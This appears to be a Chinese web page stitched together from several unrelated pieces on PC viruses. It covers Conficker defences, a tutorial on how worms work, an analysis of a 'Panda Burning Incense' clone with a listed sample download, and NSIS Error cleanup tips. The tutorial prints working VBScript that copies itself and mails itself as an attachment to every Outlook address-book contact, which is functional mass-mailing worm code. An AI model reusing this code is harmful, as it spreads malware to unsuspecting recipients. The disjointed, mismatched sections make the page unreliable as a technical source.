conficker病毒中招者注意

中了conficker病毒 中了conficker病毒 conficker病毒主要传播方式有 1.利用U盘、移动硬盘的自动播放功能传播；2.局域网内弱口令攻击；3.局域网内攻击未修补ms08-067漏洞的客户机 局域网内阻止conficker病毒传播的应该优先采用AD策略 1.强制AD中所有客户机禁用除CDROM之外的所有磁盘自动运行功能；2.拒绝客户机使用弱口令登录；3.配置windows update或采用第三方漏洞修补方案，全网扫描修复系统漏洞；4.客户机最好关闭ipc$共享 有关conficker病毒的专杀工具，不少国外厂商做了，微软每个月更新的恶意软件移除工具也可以清除该病毒。 点击查看详情：http://www.microsoft.com/china/security/malwareremove/default.mspx 　　1、蠕虫病毒有哪些危害? 　　答：一般说来，电脑感染了蠕虫病毒后，会慢得跟蠕虫那样，可能被作为僵尸电脑，向外发送大量垃圾邮件或对其它网络计算机发送攻击。还有些蠕虫会在入侵用户电脑后，下载一些盗号木马，来窃取用户的网游、网银和个人隐私信息。 　　2004年“震荡波”蠕虫爆发时，侵袭了世界各地的银行、邮政、交通等部门电脑系统，让中招电脑不断崩溃、重启，造成德尔塔航空公司约40个航班被迫取消或延误，澳大利亚成千上万的旅客滞留看台，无数工作人员重回纸质办公。 　　但Conficker非常奇怪，因为到目前为止，它除了让用户网速变得有些慢之外，还没有实施任何危害性操作。但这并不等于Conficker不会作恶，而这完全取决于Conficker幕后的控制者下一步如何动作。 　　2、普通网民和企业用户应该如何防范? 　　答：普通用户应强化网络安全意识，及时用360安全卫士这样的专业安全工具为电脑打补丁，修复系统漏洞，就能避免受到Conficker蠕虫的入侵，从而不会成为他们攻击别人网络的帮凶。 　　企业用户的局域网更是Conficker容易传播的场所，往往一台电脑‘中招’就会导致整个局域网出现大面积感染，企业员工除了用360尽快为电脑修复漏洞补丁外，建议用户在使用U盘前应尽量开启360等具有U盘防火墙功能的安全软件。从360安全中心监控的数据来看，在2亿360用户中只有极少数用户感染了Conficker蠕虫，这说明及时给用户电脑打补丁的做法，有助于防治此类蠕虫病毒的大规模爆发。 具体清除conficker蠕虫病毒方法： conficker蠕虫病毒专杀下载 http://800.bkdn.net/index.aspx http://iask.sina.com.cn/user/user.php?uid=1342206381 点击下载: 新浪本地下载 一、蠕虫病毒具有自我复制能力 　　我们以普通的VB脚本为例来看看： Set objFs=CreateObject （“Scripting.FileSystemObject”） '创建一个文件系统对象 objFs.CreateTextFile （"C:\virus.txt", 1） '通过文件系统对象的方法创建了一个TXT文件。 果我们把这两句话保存成为.vbs的VB脚本文件，点击就会在C盘中创建一个TXT文件了。倘若我们把第二句改为： CODE: objFs.GetFile （WScript.ScriptFullName）.Copy （"C:\virus.vbs"） 就可以将自身复制到C盘virus.vbs这个文件。本句前面是打开这个脚本文件，WScript.ScriptFullName指明是这个程序本身，是一个完整的路径文件名。GetFile函数获得这个文件，Copy函数将这个文件复制到C盘根目录下virus.vbs这个文件。这么简单的两句就实现了自我复制的功能，已经具备病毒的基本特征――自我复制能力。 二、蠕虫病毒具有很强的传播性 　　病毒需要传播，电子邮件病毒的传播无疑是通过电子邮件传播的。对于OutLook来说地址簿的功能相当不错，可是也给病毒的传播打开了方便之门。几乎所有通过OutLook传播的电子邮件病毒都是向地址簿中存储的电子邮件地址发送内同相同的脚本附件完成的。看看如下的代码： CODE: Set objOA=Wscript.CreateObject （"Outlook.Application"） '创建一个OUTLOOK应用的对象 Set objMapi=objOA.GetNameSpace （"MAPI"） '取得MAPI名字空间 For i=1 to objMapi.AddressLists.Count '遍历地址簿 Set objAddList=objMapi.AddressLists （i） For j=1 To objAddList. AddressEntries.Count Set objMail=objOA.CreateItem （0） objMail.Recipients.Add （objAddList. AddressEntries （j）） '取得收件人邮件地址 objMail.Subject="你好!" '设置邮件主题 objMail.Body="这次给你的附件，是我的新文档！" '设置信件内容 objMail.Attachments.Add （“c:\virus.vbs"） '把自己作为附件扩散出去 objMail.Send '发送邮件 Next Next Set objMapi=Nothing '清空objMapi变量，释放资源，值得学习的编程习惯 Set objOA=Nothing '清空objOA变量 执行后，程序复制自身到c:\ .exe (一个tab长度的空格)和%WinDIR%\system32\suchost.exe，创立文件：c:\program files\acc\acc.exe，%Temp%\0708sa.exe，创建文件夹c:\myrarwork，并且扫描系统中的.rar,.zip,.exe等文件，遇到压缩文件解压到c:\myrarwork后感染并打包回， 删除C:\WINDOWS\system32\drivers\etc\hosts文件,在"C:\WINDOWS\system32\drivers\"创建"TXPlatf0rmm.exe"并从cool_gamesetup.exe复制数据（病毒自身）写入"C:\WINDOWS\system32\drivers\TXPlatf0rmm.exe"文件。接着就是写入注册启动项，使“我的电脑->工具->文件夹选项->查看”中的“显示所有文件和文件夹功能”失效。以及加入启动项，关闭360安全卫士等病毒最可恶的是会将硬盘上备份在.rar文件包的文件解压到“c:\myrarwork”昨时文件夹，感染后再压缩回去!!!感染后缀名为exe\scr\pif\com\htm\html\asp\php\jsp\aspx的文件。exe文件被感染后，无法运行,可能是病毒的bug。病毒会在感染的文件夹下写入desktop_1.ini、desktop_2.ini,病毒的时间标志 http://bbs.pediy.com/showthread.php?p=624840 http://bbs.pediy.com/index.php 山寨熊猫烧香.rar (232.4 KB, 98 次下载) 1.5天在拾掇我哪台破计算机，原因是一、速度感觉变慢二、右下角有RAR图标闪现并有：“XX好玩的RAR游戏。。”并不受控制，查看进程多了一个TXP.....EXE进程，三、在C盘形成一个“MYRARWORK”目录，里面有好象我保存的RAR文件。四、在非系统盘多了大量的desktop_1.ini。五、执行EXE文件时会先形成一个.exe.exe的文件。六查看隐藏文件发现在非系统盘根多了一个 .EXE和一个autorun.inf文件。 Ati2evxx木马专杀工具360版v1.9.rar NSIS Error病毒介绍： 1、只破坏10M大小以下的exe文件（含install安装程序、自解压安装程序、电子书、补丁包文件等） 2、文件大小字节数不变，但用MD5校验前后校验码改变；（另右键属性可查看被修改破坏时间） 3、微软等含数字签名的exe安装文件（如补丁包）的验证时间项丢失，文件损坏； 4、ebook制作的电子书被破坏致使无法打开； 5、系统中安装的下载工具、聊天软件、大型游戏的主程序安装时间被修改（如1620年的某月某日，好像不固定）。 NSIS Error病毒传染途径： 1、下载wmv等媒体文件数字许可证； 2、伪BT种子木马； 3、带毒网络硬盘； 4、使用代理服务器； 5、密道远程连接歹毒LINUX服务器； 6、病毒文件劫持浏览器 NSIS Error病毒行为分析： 1、NSIS Error；简单说是因为Nsis编译出来的安装程序是加过壳的程序有损坏时不能通过壳的自带验证就出了这种错误。 2、*.exe不是有效的Win32位程序； 3、压缩文件格式未知或已经损坏； 4、绿色软件运行不流畅，有停滞感； 5、内存读写地址错误等。 NSIS Error病毒应急解决： 1、使用杀毒软件杀毒； 2、金山清理专家等清理恶意程序 3、删除病毒生成隐藏的非法文件名、长文件名文件夹（必须dos操作或使用粉碎机鼠标拖入粉碎操作，不支持PE光盘操作）。 4、强烈推荐使用System Repair Engineer（简称 SREng）对API HOOK 、隐藏进程、进程特权进行检测 删除系统可疑的注册启动项、浏览器加载项、系统服务等，修复系统。 5、删除安装文件夹下的uninstall.exe等所有*.exe，即可下载相关软件后重新安装或卸载。或使用优化大师的智能卸载功能，然后删除对应的安装文件夹。 NSIS Error病毒一般解决： 1、删除系统盘以外分区10M以下exe格式文件； 2、光盘启动DOS操作删除Recycled（回收站）、System Volume Information等系统隐藏文件夹;使用光盘PE系统进行删除操作的二次感染可能性亦不大。 3、格式化系统盘，重装系统。 NSIS Error病毒终极解决： 清cmos（卸电池短接，重设时间，重自检硬件，重分配资源），重新分区后安装。 NSIS Error病毒跳楼解决： 低格硬盘破坏文件流，重刷bios芯片，内存条断电重插。